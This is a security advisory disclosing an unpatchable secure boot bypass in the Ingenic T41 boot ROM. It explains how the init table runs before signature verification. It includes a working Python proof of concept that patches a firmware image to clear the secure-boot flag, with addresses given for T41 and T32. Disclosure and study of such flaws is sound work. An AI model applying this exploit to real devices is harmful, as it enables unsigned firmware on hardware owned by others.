Init table executed before secure boot check provides arbitrary memory write — bypasses signature verification entirely
Discovered: March 2026 · Vendor notified: March 17, 2026 · CVE assigned: June 2026
The Ingenic T41 SoC boot ROM parses and executes an SPL (Secondary Program Loader) header init table beforeevaluating the secure boot state and before invoking signature verification. The init table parser supports full-address 32-bit write operations. This ordering allows an attacker with physical write access to the device's boot media to write a crafted SPL image with an init-table entry that clears the SRAM-resident secure boot state flag, causing the ROM to skip verification entirely.
This vulnerability affects all known boot ROM revisions for T41 and probably also T32, T40, and A1. It was validated by hardware demonstration on a secure-boot-enabled T41 consumer camera device. The vulnerability is present in mask ROM and cannot be remediated by firmware update.
Full technical details will be published following coordinated disclosure.
The following demonstrates the init-table injection used to bypass secure boot. An INGE init-table entry is written to the SPL header at offset 0x100, targeting the SRAM security flag address. The bootrom processes this before signature verification.
#!/usr/bin/env python3
"""T41 init-table bypass — proof of concept."""
import struct
from pathlib import Path
MAGIC = 0x45474E49 # "INGE" little-endian
INIT_OFFSET = 0x100
ENTRY0_OFFSET = 0x120
TERM_OFFSET = 0x134
def inject_patch(data: bytearray, target_addr: int,
write_value: int = 0) -> None:
"""Inject init-table that clears secure boot flag."""
# Header: INGE magic + padding
struct.pack_into("<I", data, INIT_OFFSET, MAGIC)
struct.pack_into("<I", data, INIT_OFFSET + 4, 0)
# Entry 0: write value to target address
struct.pack_into("<IIIII", data, ENTRY0_OFFSET,
target_addr, # write address
0xFFFFFFFF, # poll address (skip)
write_value, # write value
0, # poll mask (skip)
0) # poll clear (skip)
# Terminator
struct.pack_into("<IIIII", data, TERM_OFFSET,
0xFFFFFFFF, 0xFFFFFFFF, 0, 0, 0)
# Usage for T41:
# data = bytearray(Path("firmware.bin").read_bytes())
# inject_patch(data, 0x80000090, 0x00000000)
# Path("patched.bin").write_bytes(data)
# T32 variant: target 0x80000024 instead of 0x80000090The init-table is parsed by the bootrom before secure boot state is checked, allowing the security flag to be cleared before signature verification runs.
Matt Davis (OpenSensor Engineering LLC) and Alfonso Gamboa — equal co-discovery.